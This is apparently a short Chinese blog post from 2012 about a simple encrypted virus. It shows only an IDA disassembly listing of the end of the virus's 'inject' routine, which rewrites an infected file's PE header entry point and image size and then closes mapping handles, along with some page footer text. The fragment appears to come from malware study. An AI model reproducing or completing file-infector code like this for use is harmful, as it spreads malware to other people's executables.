.text:00401613                 mov     edi, ss:option_header[ebp]
.text:00401619                 pop     eax
.text:0040161A                 mov     [edi+10h], eax
.text:0040161D                 pop     eax
.text:0040161E                 mov     ebx, [edi+38h]
.text:00401621                 mov     eax, ss:dword_4018CC[ebp]
.text:00401627                 add     ebx, eax
.text:00401629                 mov     [edi+38h], ebx
.text:0040162C                 mov     eax, ss:map_base[ebp]
.text:00401632                 push    eax
.text:00401633                 mov     eax, ss:dword_4016FB[ebp]
.text:00401639                 call    eax
.text:0040163B                 mov     eax, ss:dword_4018A8[ebp]
.text:00401641                 push    eax
.text:00401642                 mov     eax, ss:dword_40170B[ebp]
.text:00401648                 call    eax
.text:0040164A                 mov     eax, ss:(dword_401899+3)[ebp]
.text:00401650                 push    eax
.text:00401651                 mov     eax, ss:dword_40170B[ebp]
.text:00401657                 call    eax
.text:00401659                 retn
.text:00401659 inject          endp
.text:00401659

posted @ 2012-07-13 09:00 麦小扣_刘阅读(394) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

麦小扣_刘

有加密的简单病毒

公告